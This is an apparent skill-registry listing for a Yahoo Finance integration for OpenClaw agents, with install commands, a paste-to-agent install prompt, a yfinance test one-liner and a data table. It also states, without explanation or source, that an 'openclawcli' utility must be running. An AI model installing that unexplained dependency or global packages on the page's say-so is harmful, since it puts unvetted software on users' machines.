A powerful financial data integration for retrieving real-time stock prices, historical market trends, and detailed company analytics.
The fastest way to install a skill directly from the registry.
npx clawhub@latest install yahoofinance
Copy the skill folder to one of these locations
~/.openclaw/skills/ <project>/skills/ Priority: Workspace > Local > Bundled
Copy this prompt to OpenClaw to install it automatically.
Help me install yahoofinance using Clawhub. If Clawhub is not installed, install it first (npm i -g clawhub).
Get the raw skill files in a ZIP archive.
The Yahoo Finance skill enables AI agents to interact with global financial markets directly. By leveraging the yfinance library and the required openclawcli utility, users can fetch comprehensive data including stock quotes, cryptocurrency prices, and forex rates. This tool is essential for developers building automated trading bots, portfolio trackers, or financial research assistants within the Openclaw Skills ecosystem. It provides a bridge between raw market data and actionable insights for any agent-driven workflow.
To begin, install the required Python library:
pip install yfinance
Important: This skill requires openclawcli to be active.
Once the CLI utility is running, you can verify the setup with a quick quote:
python3 -c "import yfinance as yf; t = yf.Ticker('AAPL'); print(t.info.get('currentPrice'))"
The skill organizes financial data into structured formats suitable for analysis:
| Data Category | Structure | Key Metadata |
|---|---|---|
| Ticker Info | Key-Value Pairs | Sector, Market Cap, P/E Ratio, 52-Week High/Low |
| Historical Data | Time-Series (CSV) | Open, High, Low, Close, Volume, Dividends, Splits |
| Financial Statements | Tabular/Dataframe | Income Statement, Balance Sheet, Cash Flow items |
| Options Chain | List of Objects | Strike Price, Last Price, Volume, Implied Volatility |
| Market News | Array | Title, Publisher, Link, Related Tickers |
Loading
A professional CLI-driven skill for fetching, filtering, and analyzing real-time trending topics and hashtags on X (Twitter).

A powerful CLI-driven skill for searching, filtering, and analyzing trending topics on X (Twitter) across global and local markets.

A comprehensive tool for building, configuring, and managing Telegram bots using the official Bot API.

A comprehensive toolset for analyzing, tracking, and automating trades on the Polymarket decentralized prediction platform.

A powerful utility to programmatically extract, clean, and prepare YouTube transcripts for AI-driven summarization and content analysis.

A versatile tool for downloading YouTube video thumbnails in multiple resolutions and formats using yt-dlp.








































